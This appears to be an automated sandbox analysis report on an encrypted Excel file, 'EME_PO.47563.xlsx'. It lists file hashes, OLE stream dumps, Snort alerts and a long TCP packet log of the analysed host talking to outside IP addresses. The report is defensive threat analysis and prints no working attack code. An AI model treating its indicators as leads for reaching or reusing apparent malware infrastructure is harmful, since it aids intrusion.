......................@..B........................H.......H................................................................0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(....t......\|......(...+...3...s....}.....~....}.....(.......(......0.............(........(.......................0..4........r...p(.............s....}........{......(....}....:..{....(....&..0..................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.960930778239428
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	EME_PO.47563.xlsx
File size:	201728
MD5:	3ef301afc6cc945e31ab9c8f4c24b29c
SHA1:	fc4f87402b120027927a5303eb3ced1e96f979a4
SHA256:	f6feb4b1cb9e6c6df4cab250ed38f0b25d6033ce97a7e68dbf90eb6c49fb1b13
SHA512:	8d0d4a29dd5ae9d60f160aa1d9406b59c7cac9c43146e9ebfc9c4e116ca328554087fe81e2f73f643ba3d5a6faeab71e2a24878c6af0efadd54e4be15ca64881
SSDEEP:	6144:3TWq7m2xCRdahQX1AxH171aJO/6kNHI4f/1xFxxm:3Rm2GahUAdRQJO/fHI4f/1lxm
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "EME_PO.47563.xlsx"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64

General
Stream Path:	\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type:	data
Stream Size:	64
Entropy:	2.73637206947
Base64 Encoded:	False
Data ASCII:	. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw:	08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112

General
Stream Path:	\x6DataSpaces/DataSpaceMap
File Type:	data
Stream Size:	112
Entropy:	2.7597816111
Base64 Encoded:	False
Data ASCII:	. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw:	08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200

General
Stream Path:	\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type:	data
Stream Size:	200
Entropy:	3.13335930328
Base64 Encoded:	False
Data ASCII:	X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76

General
Stream Path:	\x6DataSpaces/Version
File Type:	data
Stream Size:	76
Entropy:	2.79079600998
Base64 Encoded:	False
Data ASCII:	< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw:	3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 194632

General
Stream Path:	EncryptedPackage
File Type:	data
Stream Size:	194632
Entropy:	7.9980105307
Base64 Encoded:	True
Data ASCII:	5 . . . . . . . y 5 . e k . . o . . . . . 9 . . . . . i . . . . . 7 C J + k ? Q . . . 6 . . M . 3 { S ( . [ 7 . . . . . _ z . 6 . . . s . H . . 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p . . . / . 3 . # 0 . . . X . ' p
Data Raw:	35 f8 02 00 00 00 00 00 79 35 8c 65 6b 2e 9f 6f 0c ef c1 01 f7 39 d2 b7 02 92 a5 69 99 7f 13 19 c5 37 43 4a 2b 6b 3f 51 c3 a1 c6 36 0b 82 4d 1d 33 7b 53 28 d2 5b 37 b9 da b8 16 13 5f 7a 19 36 0e 1a 9d 73 93 48 ee ef 30 b8 a1 80 58 dc 27 70 bd c6 dc 2f 18 33 18 23 30 b8 a1 80 58 dc 27 70 bd c6 dc 2f 18 33 18 23 30 b8 a1 80 58 dc 27 70 bd c6 dc 2f 18 33 18 23 30 b8 a1 80 58 dc 27 70

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224

General
Stream Path:	EncryptionInfo
File Type:	data
Stream Size:	224
Entropy:	4.5136937946
Base64 Encoded:	False
Data ASCII:	. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . f ' ' c . . . j ^ y ( . 4 . . s . . R . . . . . . 8 S . . . . . . . . v . G m . . . M b 8 . . . . . > . . . S . . . U l . . . .
Data Raw:	04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/26/20-21:17:16.761616	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8
11/26/20-21:17:17.772731	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8
11/26/20-21:17:19.785661	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8
11/26/20-21:17:21.088021	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49169	23.227.38.74	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2020 21:16:00.625966072 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.744024992 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.744132996 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.744925022 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.866168022 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.866190910 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.866204023 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.866215944 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.866286993 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.866332054 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.984383106 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.984409094 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.984560966 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.985613108 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.985630035 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.985641956 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.985656977 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.985671043 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.985686064 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:00.985702991 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.985724926 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:00.985730886 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.102469921 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.102499008 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.102510929 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.102523088 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.102731943 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.103353024 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.103369951 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.103380919 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.103396893 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.103429079 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.103452921 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.105675936 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105691910 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105705023 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105719090 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105730057 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105742931 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105755091 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105758905 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.105783939 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.105788946 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.105849981 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.105873108 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.108016014 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.220751047 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220778942 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220789909 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220802069 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220813036 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220824003 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220834970 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.220845938 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221050024 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221066952 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221077919 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221091986 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221103907 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221115112 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221116066 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.221127033 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221138954 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.221163034 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.221178055 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.221223116 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.223505020 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223525047 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223537922 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223550081 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223572016 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223587990 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223601103 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223613024 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223618031 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.223633051 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223649025 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223649979 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.223701954 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.223750114 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223766088 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223779917 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223792076 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223803997 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.223834991 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.223870039 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.224059105 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.339143991 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339169979 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339181900 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339198112 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339210033 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339221001 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339234114 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339246035 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339257956 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339270115 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339281082 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339293003 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339303970 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339315891 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339327097 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339339018 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339340925 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.339349985 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339365005 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339376926 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339390039 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339401960 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339415073 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339417934 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.339426041 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339437962 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.339476109 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.339515924 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.341897011 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341916084 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341928005 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341939926 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341950893 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341963053 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341974020 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341984987 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.341996908 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342014074 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342031002 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342040062 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.342042923 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342055082 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342066050 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342078924 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342089891 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342089891 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.342102051 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342113018 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342128992 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342139006 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.342140913 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342153072 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342164040 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342175961 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342186928 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.342189074 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.342228889 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.342268944 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.342659950 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.457756996 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457784891 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457796097 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457808971 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457819939 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457832098 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457844019 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.457858086 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.458125114 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460566044 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460585117 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460597992 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460613012 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460623980 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460635900 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460648060 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460660934 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460675001 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460691929 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460704088 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460731030 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460746050 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460757971 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460771084 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460772038 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460784912 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460798025 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460800886 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460805893 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460812092 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460825920 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460843086 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460870981 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460882902 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460886002 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460897923 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460908890 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460910082 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460922003 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460933924 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460944891 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460957050 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460958004 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.460968018 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460979939 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.460990906 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461000919 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.461004019 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461015940 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461028099 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461040020 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461050987 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461055994 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.461061954 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461074114 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461086035 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461097956 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.461102009 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.461143970 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.461183071 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.463768005 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.466344118 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.576491117 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576513052 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576524973 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576535940 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576546907 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576558113 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576570034 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576581955 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576594114 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576607943 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576621056 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576632023 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.576795101 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.576836109 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579032898 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579047918 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579060078 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579072952 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579083920 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579094887 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579106092 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579118013 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579129934 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579140902 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579152107 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579163074 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579174995 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579186916 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579199076 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579210043 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579210997 CET	49165	80	192.168.2.22	192.227.129.22
Nov 26, 2020 21:16:01.579221964 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579232931 CET	80	49165	192.227.129.22	192.168.2.22
Nov 26, 2020 21:16:01.579238892 CET	49165	80	192.168.2.22	192.227.129.22
